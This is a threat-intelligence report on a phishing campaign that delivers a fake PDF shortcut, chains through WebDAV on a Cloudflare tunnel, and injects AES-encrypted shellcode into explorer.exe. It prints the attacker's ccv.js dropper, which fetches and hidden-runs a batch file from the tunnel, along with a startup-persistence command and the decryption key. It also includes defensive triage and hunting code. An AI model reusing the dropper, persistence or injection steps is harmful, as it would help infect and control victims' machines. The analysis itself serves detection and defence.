Severity: High | Category: Phishing

Operation WsgiDev Tunnel — Cloudflare Tunnel Hosting WsgiDAV Multi-Stage Malware Delivery

Investigated: April 3, 2026 | Published: April 3, 2026
Tags: trycloudflare, wsgidev, c2, rat, cloudflare, wsgidav, tor, lnk

TLP: WHITE
Date: 2026-04-03
Analyst: GHOST (Breakglass Intelligence)
Classification: Cybercrime — Malware Staging via Cloudflare Tunnel
Status: LIVE (as of 2026-04-03T03:09Z)


Executive Summary

A live Cloudflare Tunnel (trycloudflare.com) was discovered hosting a WsgiDAV 4.3.3 open directory server serving a multi-stage malware infection chain. The attack chain uses a German-language social engineering lure (fake PDF document) delivered via a Windows Shortcut (.LNK) file that chains through WebDAV to execute an encrypted shellcode loader. The shellcode is AES-256-CBC encrypted and injected into explorer.exe via classic process injection (VirtualAllocEx + WriteProcessMemory + CreateRemoteThread). None of the indicators have been previously reported to VirusTotal, MalwareBazaar, ThreatFox, or URLhaus — this is a novel, unreported campaign.

The operator built the LNK on a VPS named vps-756346 using an Administrator account. The CF-Ray header routes through Amsterdam, and the "dokumente" directory name is German — strongly suggesting a German-speaking target audience and potentially a European-based operator.

Key Findings

  • NOVEL CAMPAIGN: Zero detections across all major threat intelligence platforms (VT, MalwareBazaar, ThreatFox, URLhaus, URLScan)
  • Full infection chain recovered: LNK -> WSH -> JS (WebDAV) -> BAT (PowerShell) -> Python embedded runtime -> AES-256-CBC shellcode decryption -> Process injection into explorer.exe
  • German-targeting: Directory named "dokumente" (German for "documents"), LNK disguised as DKM_00KS0095283.PDF (DKM = Deutsche Kreditbank Mecklenburg or similar German financial institution reference)
  • AES-256-CBC shellcode: 101,634 bytes of decrypted position-independent shellcode with PEB-walking API resolver — no readable strings, heavily obfuscated
  • Persistence: Creates CryptoLoader.lnk in Windows Startup folder
  • OPSEC failure: Machine name vps-756346 and user Administrator embedded in LNK metadata — the actor built the payload on a numbered VPS, likely a cloud instance
  • Anonymous read-write WebDAV access: Server allows unauthenticated writes, meaning the operator (or anyone) can update payloads in real-time

Attack Chain

[1] Victim receives/downloads: dokumente/DKM_00KS0095283.PDF.lnk
    (Disguised as PDF with Edge browser icon, actually Windows Shortcut)
         |
         v
[2] LNK executes: wscript.exe \\trycloudflare...@SSL\DavWWWRoot\oa.wsh
    (Windows Script Host opens .wsh file via WebDAV over HTTPS)
         |
         v
[3] oa.wsh loads: \\trycloudflare...@SSL\DavWWWRoot\ccv.js
    (WSH settings file points to JavaScript payload on same WebDAV)
         |
         v
[4] ccv.js copies final.bat to %TEMP%\r.bat and executes it hidden
    (ActiveXObject WScript.Shell + FileSystemObject via WebDAV)
         |
         v
[5] final.bat (hidden window):
    a. Downloads Python 3.11.8 embedded from python.org
    b. Installs pip, psutil, cryptography, pyaes
    c. Downloads files.zip from trycloudflare tunnel
    d. Extracts: encrypted_loader.py + as_encrypted.bin + as_key.bin
    e. Downloads add_to_startup.bat for persistence
         |
         v
[6] encrypted_loader.py:
    a. Reads as_key.bin (48 bytes: 32-byte AES key + 16-byte IV)
    b. Decrypts as_encrypted.bin with AES-256-CBC
    c. Strips PKCS7 padding -> 101,634 bytes of raw shellcode
    d. Finds explorer.exe PID via CreateToolhelp32Snapshot
    e. OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
         |
         v
[7] Shellcode executes inside explorer.exe:
    - Position-independent code with PEB-walking API resolution
    - 77 KB encrypted data blob + 23 KB loader code
    - Likely staged C2 beacon (Cobalt Strike / Sliver / custom)
         |
         v
[8] Persistence: add_to_startup.bat creates CryptoLoader.lnk
    in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    -> Re-runs encrypted_loader.py on every login

Infrastructure Analysis

Cloudflare Tunnel

Property | Value
Full URL | hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/
Tunnel Type | Cloudflare Quick Tunnel (trycloudflare.com)
WebDAV Server | WsgiDAV/4.3.3
Authentication | Anonymous (read-write)
CF-Ray | AMS (Amsterdam PoP)
Status | LIVE (2026-04-03T03:09Z)
First Activity | 2026-03-23 (earliest file timestamp: add_to_startup.bat)
Last Activity | 2026-03-31 (final.bat, ccv.js, oa.wsh, LNK updated)

Tunnel Characteristics

Cloudflare Quick Tunnels (trycloudflare.com) are ephemeral, free, anonymous tunnels that require no Cloudflare account. They:

  • Generate random 4-word subdomains ("requires-fortune-nutten-eligible")
  • Proxy traffic through Cloudflare CDN, hiding the true origin IP
  • Can be created and destroyed in seconds
  • Are increasingly abused for malware staging (no attribution, no billing, no logs accessible to investigators)

The word "nutten" in the subdomain is notable — it is German slang (vulgar), which may or may not be coincidental given the German-language targeting.

File Inventory

File | Type | Size | SHA256 | Modified
dokumente/DKM_00KS0095283.PDF.lnk | Windows Shortcut | 1,904 B | 7082ed18f1eaaccfdea66bfa51aa6d00113dadf35b9d60d5688604b9744c1c01 | 2026-03-31
oa.wsh | Windows Script Host Settings | 117 B | a6a2de606b094f7c4d35cd7cb02f5a512f72981110981fab2bf737ad52bc4506 | 2026-03-31
ccv.js | JScript (ActiveXObject) | 296 B | 354e069edf6d52b43326a8f6408e95c0bd4c5cb6da3a81971036e18f8b2ca8c6 | 2026-03-31
final.bat | Batch Installer Script | 7,512 B | ea4043b07992e4aefb3e15b2ef3ddd71de315109c01b4230585cc213ab6ec3dd | 2026-03-31
files.zip | Payload Archive | 104,873 B | a9ebfd647cb5930c3a19c3fd66f103c06019f43aa53b8d309d31682514a9cd60 | 2026-03-23
add_to_startup.bat | Persistence Script | 495 B | 717bb7be812fe4f57d4b7f1add1654b8a2dfb6063bd616cc26748039f247c43f | 2026-03-23
desktop.ini | Folder Customization | 504 B | 8301e344371b0753d547b429c5fe513908b1c9813144f08549563ac7f4d7da68 | 2021-08-20

Extracted from files.zip

File | Size | SHA256
encrypted_loader.py | 8,923 B | 4a510219ffc0f5bc4acdf6e33d80d85d88155d88049cedaa00aaa9eed8051a3f
as_encrypted.bin | 101,648 B | 869b721401fd595867ea3320a2709d100751f8f9d25f8a59cc28af7169325131
as_key.bin | 48 B | 0c775d9263fff22c04d75d12b0a5d1a5b73c5a787a7dcdd34fabccdf9e0a0fe5

Decrypted Shellcode

Property | Value
SHA256 | fb7ee12fb8d66e18ca1e629342c4c2fd5874ec11abcf338e17de69c499afb5cf
Size | 101,634 bytes
Encryption | AES-256-CBC, PKCS7 padding
AES Key | 98e00a19c5940403589a54508be5d2de3c3a633bc578aa4ef4e6bc3a649a24b1
AES IV | 87c2065f49f439294373e10c569d35bb
Architecture | x86-64
Loader Type | Position-independent shellcode with PEB-walking API resolver
Structure | 77 KB encrypted data blob (offset 5-0x12f8d) + 23 KB loader code (0x12f8d+)
API Resolution | PEB walk via gs:[0x60] -> PEB_LDR_DATA -> InLoadOrderModuleList

Malware Analysis

Stage 1: LNK File (DKM_00KS0095283.PDF.lnk)

Social Engineering: The file is named to appear as a German financial document (DKM_00KS0095283.PDF) but is actually a Windows Shortcut. It uses the Microsoft Edge icon (msedge.exe) to further disguise itself.

LNK Metadata:

  • Target: C:\Windows\System32\wscript.exe
  • Arguments: \\requires-fortune-nutten-eligible.trycloudflare.com@SSL\DavWWWRoot\oa.wsh
  • Working Dir: C:\Users\Administrator\Music (with path traversal)
  • Icon: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
  • Machine Name: vps-756346 (OPSEC failure)
  • User: Administrator
  • Timestamps: 2021-05-08T08:14:38 (likely copied from a template or time-stomped)

Stage 2: WSH Chain (oa.wsh -> ccv.js)

oa.wsh is a Windows Script Host settings file that simply references ccv.js on the same WebDAV share:

[ScriptFile]
Path=\\requires-fortune-nutten-eligible.trycloudflare.com@SSL\DavWWWRoot\ccv.js
[Options]
Timeout=0

ccv.js uses ActiveXObject to copy and execute the next stage:

with(new ActiveXObject('WScript.Shell')){
    // Resolve %TEMP%\r.bat on the victim host
    var target = ExpandEnvironmentStrings('%TEMP%\\r.bat');
    // Copy final.bat from the WebDAV share (UNC path over HTTPS) into %TEMP%
    new ActiveXObject('Scripting.FileSystemObject').CopyFile(
        '\\\\requires-fortune-nutten-eligible.trycloudflare.com@SSL\\DavWWWRoot\\final.bat',
        target
    );
    // Execute the copied batch file with window style 0 (hidden)
    Run('"' + target + '"', 0);
}

Stage 3: Installer (final.bat)

The batch script performs the following in a hidden PowerShell window:

  1. Creates working directory: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache (blends with legitimate Windows crypto cache)
  2. Downloads Python 3.11.8 embedded (amd64) from python.org
  3. Modifies the ._pth file to enable site-packages and pip
  4. Installs pip, then: psutil, cryptography, pyaes
  5. Downloads files.zip from the trycloudflare tunnel and extracts it
  6. Downloads add_to_startup.bat for persistence
  7. Validates presence of: encrypted_loader.py, as_encrypted.bin, as_key.bin
  8. Validates key file is exactly 48 bytes
  9. Executes: python encrypted_loader.py -f as_encrypted.bin explorer.exe
  10. Sets persistence via add_to_startup.bat

Stage 4: Shellcode Loader (encrypted_loader.py)

A Python-based AES-256-CBC decryptor and process injector:

  1. Reads as_key.bin (32-byte key + 16-byte IV = 48 bytes)
  2. Decrypts as_encrypted.bin using AES-256-CBC with cryptography library
  3. Strips PKCS7 padding
  4. Enumerates processes via CreateToolhelp32Snapshot to find explorer.exe
  5. Opens explorer.exe with PROCESS_ALL_ACCESS (0x001F0FFF)
  6. Allocates RWX memory via VirtualAllocEx
  7. Writes decrypted shellcode via WriteProcessMemory
  8. Creates remote thread via CreateRemoteThread
  9. Waits 5 seconds for execution

Stage 5: Shellcode

The decrypted shellcode (101,634 bytes) is position-independent x64 code:

  • Entry: CALL +0x12f8d (the call jumps over the data blob; its return address, offset 5, is the start of the blob and is what gets pushed onto the stack)
  • Data blob: 77,704 bytes at offset 5 (length field at offset 5 = 0x12f88)
  • Loader code: Starts at offset 0x12f8d with POP RCX (retrieves data address)
  • PEB walk: Located at offset 0x1647a, accesses gs:[0x60] for module enumeration
  • No readable strings: The shellcode is fully obfuscated — no API names, URLs, or configuration strings visible in plaintext
  • Likely framework: Custom or Donut-style shellcode with encrypted inner payload. The data blob likely contains a second encryption layer protecting the final implant (RAT, stealer, or C2 beacon)
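The call-over-data layout described above (CALL rel32 skipping the blob, POP RCX at the target recovering its address) can be recognised mechanically. The following Python triage helper is an added example, not code from the report or from the sample: it derives the data and loader offsets from the leading CALL, checks for the POP RCX, and measures the entropy of the skipped blob to support the "encrypted inner payload" assessment. The buffer it builds is constructed to the report's dimensions only; `triage`, `build_sample` and the function names are assumptions of the example.

```python
import math
import random
import struct

# Layout described in the report: a 5-byte CALL rel32 at offset 0 jumps over an
# embedded data blob and lands on loader code that begins with POP RCX (0x59),
# so the CALL's return address (offset 5, the start of the blob) ends up in RCX.
CALL_OPCODE, POP_RCX, HEADER_LEN = 0xE8, 0x59, 5   # HEADER_LEN: E8 + 4-byte rel32

def parse_call_pop_layout(blob: bytes) -> dict:
    """Return data/loader offsets for a CALL/POP-over-data layout, else ValueError."""
    if len(blob) <= HEADER_LEN or blob[0] != CALL_OPCODE:
        raise ValueError("no CALL rel32 at offset 0")
    rel32 = struct.unpack_from("<i", blob, 1)[0]
    loader_off = HEADER_LEN + rel32  # CALL target = next instruction + rel32
    if rel32 <= 0 or loader_off >= len(blob):
        raise ValueError("CALL target is not a forward jump inside the buffer")
    if blob[loader_off] != POP_RCX:
        raise ValueError("CALL target does not start with POP RCX")
    return {
        "data_offset": HEADER_LEN,
        "data_length": rel32,  # exactly the bytes the CALL skips over
        "loader_offset": loader_off,
        "loader_length": len(blob) - loader_off,
    }

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; values near 8.0 indicate encrypted or compressed content."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def triage(blob: bytes) -> dict:
    """Parse the layout and add the entropy of the skipped data blob."""
    layout = parse_call_pop_layout(blob)
    start, end = layout["data_offset"], layout["loader_offset"]
    layout["data_entropy"] = round(shannon_entropy(blob[start:end]), 3)
    return layout

def build_sample(data_len: int = 0x12F88, loader_len: int = 0x5D75) -> bytes:
    """Constructed stand-in with the report's dimensions (not the real shellcode)."""
    rng = random.Random(1)  # deterministic pseudo-random bytes stand in for the blob
    data = bytes(rng.getrandbits(8) for _ in range(data_len))
    loader = bytes([POP_RCX]) + b"\x90" * (loader_len - 1)  # POP RCX, then filler
    return bytes([CALL_OPCODE]) + struct.pack("<i", data_len) + data + loader

if __name__ == "__main__":
    print(triage(build_sample()))  # total length 101,634 bytes, as in the report
```

On a real decrypted sample, a blob entropy near 8.0 alongside a low-entropy loader is what you would expect if the inner payload carries its own encryption layer, as the report suggests.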

Stage 6: Persistence

add_to_startup.bat creates a shortcut in the Windows Startup folder:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\CryptoLoader.lnk
  -> cmd.exe /c cd /d %BASEDIR% && start /b python.exe encrypted_loader.py -f as_encrypted.bin explorer.exe

This ensures the shellcode is re-injected into explorer.exe on every user login.

Threat Actor Profile

Attribution Assessment

  • Confidence: LOW-MEDIUM
  • Region: Likely Central/Western Europe (German-language targeting, Amsterdam CF-PoP routing)
  • Motivation: Financial crime (credential theft or banking trojan targeting German speakers)
  • Sophistication: MODERATE — custom shellcode with AES encryption and process injection, but significant OPSEC failures

OPSEC Failures

  1. Machine name vps-756346 embedded in LNK metadata — this is a cloud VPS hostname (likely Hetzner, DigitalOcean, or Vultr naming convention)
  2. Administrator account used to build the LNK — no attempt to use a non-default username
  3. Anonymous read-write WebDAV — anyone can modify the payloads, and the open directory was trivially discoverable
  4. Python dependency chain — downloading Python, pip, and 3 packages from public sources creates a large network footprint and multiple detection opportunities
  5. Verbose logging — final.bat writes detailed logs to setup.log including error messages and timestamps
  6. Reuse of trycloudflare — while anonymous, the tunnel subdomain is static and easily blocked

Targeting Analysis

  • Language: German (dokumente = documents)
  • Lure: Financial document — DKM_00KS0095283.PDF (DKM likely references Deutsche Kreditbank or similar German institution; the format resembles a German bank reference number)
  • Likely delivery: Email attachment or download link, possibly phishing German banking/financial sector victims
  • desktop.ini timestamp: 2021-08-20 — this file may have been reused from an older campaign or toolkit

MITRE ATT&CK Mapping

Tactic | Technique | ID | Application
Initial Access | Phishing: Spearphishing Attachment | T1566.001 | LNK file disguised as PDF
Execution | User Execution: Malicious File | T1204.002 | Victim opens DKM_00KS0095283.PDF.lnk
Execution | Windows Management Instrumentation | T1047 | WScript.Shell ActiveXObject
Execution | Command and Scripting: JavaScript | T1059.007 | ccv.js via WScript
Execution | Command and Scripting: Windows Cmd | T1059.003 | final.bat batch script
Execution | Command and Scripting: Python | T1059.006 | encrypted_loader.py
Defense Evasion | Obfuscated Files: Encrypted | T1027.013 | AES-256-CBC shellcode encryption
Defense Evasion | Masquerading: Double Extension | T1036.007 | .PDF.lnk double extension
Defense Evasion | Process Injection | T1055.003 | Thread execution hijacking in explorer.exe
Defense Evasion | Hidden Window | T1564.003 | PowerShell -WindowStyle Hidden
Defense Evasion | Masquerading: Match Legitimate Name | T1036.005 | CryptoLoader in Windows\Crypto\RSA\Cache
Persistence | Boot/Logon Autostart: Startup Folder | T1547.001 | CryptoLoader.lnk in Startup
Command and Control | Application Layer: Web Protocols | T1071.001 | WebDAV over HTTPS via Cloudflare
Command and Control | Proxy: External Proxy | T1090.002 | Cloudflare Tunnel as C2 proxy
Resource Development | Acquire Infrastructure: Web Service | T1583.006 | trycloudflare.com tunnel

IOC Summary

Network Indicators

  • requires-fortune-nutten-eligible[.]trycloudflare[.]com (Cloudflare Quick Tunnel — malware staging)
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/ (WsgiDAV open directory)
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/dokumente/DKM_00KS0095283.PDF.lnk
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/final.bat
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/files.zip
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/ccv.js
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/oa.wsh
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/add_to_startup.bat

WebDAV Paths

  • \\requires-fortune-nutten-eligible[.]trycloudflare[.]com@SSL\DavWWWRoot\oa.wsh
  • \\requires-fortune-nutten-eligible[.]trycloudflare[.]com@SSL\DavWWWRoot\ccv.js
  • \\requires-fortune-nutten-eligible[.]trycloudflare[.]com@SSL\DavWWWRoot\final.bat

File Indicators

SHA256 hashes for every stage file are listed per file in the File Inventory and "Extracted from files.zip" tables above; the hash of the decrypted shellcode is in the Decrypted Shellcode table.

Behavioral Indicators

  • Install path: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\
  • Persistence: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\CryptoLoader.lnk
  • Log file: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\setup.log
  • Temp file: %TEMP%\r.bat
  • Process injection target: explorer.exe via CreateRemoteThread
  • Python packages installed: psutil, cryptography, pyaes
  • User-Agent pattern: PowerShell Invoke-WebRequest (default UA)

Host Forensic Indicators

  • Machine name in LNK: vps-756346
  • LNK builder user: Administrator
  • Desktop.ini timestamp: 2021-08-20T23:40:25Z (potential toolkit reuse date)

Immediate (24-48 hours)

  1. Block the tunnel domain: requires-fortune-nutten-eligible.trycloudflare.com at DNS and proxy level
  2. Hunt for WebDAV connections: Search for trycloudflare.com@SSL\DavWWWRoot in EDR/proxy logs
  3. Search for persistence artifact: CryptoLoader.lnk in user Startup folders
  4. Check for install path: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\encrypted_loader.py
  5. Search for r.bat: In %TEMP% directories on endpoints
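The five hunts above can be run as a single pass over endpoint process-creation logs. The Python below is an added example, not part of the report: it encodes the report's artefacts as regexes applied to the image path plus command line, and runs them over a constructed pipe-delimited log. The log format, the rule names and the `hunt` function are assumptions of the example; real EDR exports will need their own field mapping.

```python
import re

# Artefacts named in the report's hunting guidance, expressed as regexes that are
# applied to "image + command line"; most specific rule first. Names are assumed.
RULES = [
    ("wsh_webdav_trycloudflare",
     r"\b[wc]script\.exe\b.*\\\\[a-z0-9-]+\.trycloudflare\.com@SSL\\DavWWWRoot\\"),
    ("webdav_trycloudflare_any_process",
     r"\\\\[a-z0-9-]+\.trycloudflare\.com@SSL\\DavWWWRoot\\"),
    ("python_from_crypto_rsa_cache",
     r"\\Microsoft\\Windows\\Crypto\\RSA\\Cache\\.*python(\.exe)?\b.*encrypted_loader\.py"),
    ("startup_cryptoloader_lnk",
     r"\\Start Menu\\Programs\\Startup\\CryptoLoader\.lnk"),
    ("temp_r_bat",
     r"\\Temp\\r\.bat\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

def parse_line(line: str):
    """Parse 'timestamp|host|image|command_line' (constructed format); None if malformed."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        return None
    return dict(zip(("ts", "host", "image", "cmdline"), parts))

def hunt(lines) -> list:
    """Return (host, rule, cmdline) for each line matching a rule (first rule wins)."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        text = ev["image"] + " " + ev["cmdline"]
        for name, rx in COMPILED:
            if rx.search(text):
                hits.append((ev["host"], name, ev["cmdline"]))
                break
    return hits

# Constructed process-creation events mirroring the chain; only the last one is benign.
SAMPLE_LOG = """\
2026-04-02T09:13:02Z|WS-0142|C:\\Windows\\System32\\wscript.exe|wscript.exe \\\\requires-fortune-nutten-eligible.trycloudflare.com@SSL\\DavWWWRoot\\oa.wsh
2026-04-02T09:13:05Z|WS-0142|C:\\Windows\\System32\\cmd.exe|cmd /c C:\\Users\\j.m\\AppData\\Local\\Temp\\r.bat
2026-04-02T09:14:40Z|WS-0142|C:\\Users\\j.m\\AppData\\Roaming\\Microsoft\\Windows\\Crypto\\RSA\\Cache\\python.exe|python.exe encrypted_loader.py -f as_encrypted.bin explorer.exe
2026-04-02T09:20:11Z|WS-0077|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\a.b\\Documents\\notes.txt
"""

if __name__ == "__main__":
    for host, rule, cmdline in hunt(SAMPLE_LOG.splitlines()):
        print(f"{host}: {rule}: {cmdline}")
```

The second rule deliberately matches any process touching a trycloudflare WebDAV share, which supports the report's broader advice to treat such access as anomalous rather than only hunting for wscript.exe.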

Short-term (1-2 weeks)

  1. Deploy YARA rules (see below) to scan endpoints and email gateways
  2. Deploy Suricata rules (see below) for network monitoring
  3. Block trycloudflare.com WebDAV: Consider blocking all WebDAV access to *.trycloudflare.com domains — legitimate use is rare
  4. Submit IOCs to VirusTotal, MalwareBazaar, ThreatFox, URLhaus

Medium-term (1-3 months)

  1. Monitor for tunnel rotation: The actor may create new trycloudflare tunnels with different subdomains but identical payloads
  2. Monitor for payload updates: The WebDAV server allows writes — the actor may update the shellcode
  3. Develop behavioral detection: Python embedded runtime + process injection from AppData is highly anomalous
